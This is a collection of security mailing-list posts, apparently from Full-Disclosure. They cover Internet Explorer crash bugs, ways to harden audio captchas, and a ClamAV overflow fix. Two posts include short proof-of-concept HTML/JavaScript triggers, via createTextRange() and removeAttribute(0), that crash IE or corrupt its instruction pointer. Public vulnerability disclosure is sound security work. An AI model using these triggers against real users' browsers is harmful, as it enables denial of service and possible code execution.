[Full-disclosure] IE crash
I can't find any info on this delicious IE bug, but it seems to be publicly known: input type=checkbox id='c' script r=document.getElementById(c); a=r.createTextRange(); /script It will badly access a (virtual?) pointer table, making EIP to jump at a random address. This has various effects on the system I've tested with, including crashing. It works on these versions of mshtml.dll: XP SP2: 6.0.2900.2802 - latest WS2003: 6.0.3790.0 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fun with DHTML
H D Moore wrote: How bugs can you find in your browser? The recent IE issues only scratched the service of the DHTML/behavior bugs. The HTML/JS page below can be used to find all sorts of bugs in different browsers. I stopped caring about these after the first three invalid derefences. http://metasploit.com/users/hdm/tools/hamachi/hamachi.html Nice work ! On the IE front, besides the now known createTextRange() problem, no other high risk behavior is observed. However, you tool will uncover a *new, low risk IE vulnerability* (DoS). When using the removeAttribute() method on certain HTML elements, a NULL pointer is accessed, leading to a browser crash. The vulnerable elemets are FORM, TABLE, and SELECT: body onload='nullptr()' select id='s' script function nullptr(){ a=document.getElementById('s').removeAttribute(0); } /script /body ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] defeating voice captchas
Gadi Evron wrote: Therefore, how many times does one have to refresh the page and listen to the Captcha to be able to simply learn to identify the Captcha by say, an MD5 hash of the audio for each letter? That is just a bad implementation, when done well audio Captchas are probably as secure as their visual counterparts. Done well means that, besides the 10 digits (and/or 26 letters) recorded by the sexy voice and replayed in a random order, the audio is mixed with multiple sound sources, different for each generated Captcha. For example, you can use a symphony(*), random white noise, the sound of the street, or all of these, at a level of 3 or 6 dB above the voice. The brain can easily distinguish the secret code from all the background noise, but it's much more difficult for a computer. While I'm not an audio expert either, I'm sure this problem is allot harder than a simple MD5 - just look how bad state of the art voice recognition software performs in almost ideal conditions, i.e. no background noise etc. (*) Of course, it's better to use sound sources that are hard to identify, and are ideally not available to the attacker; else he could obtain the same sounds and subtract them from the audio. I think some random pitch shifting (tremolo) would help against this. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Window's O/S
jacob jango wrote: create an folder on deskop and name it as notepad. open internet explorer go to view source code this will open the contents of notepad folder!! Even better: rename any exe to notepad.exe ;) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Re: ClamAV Multiple Rem0te Buffer Overflows
nick wrote: The clamav.net front page says Latest ClamAV stable release is: 0.86.2. Is this included in your advisory? clamav 0.86.2 released (Mon, 25 Jul 2005 00:35:58 GMT) Notes: 0.86.2 -- Changes in this release include fixes for three possible integer overflows in libclamav, signature.asc Description: OpenPGP digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/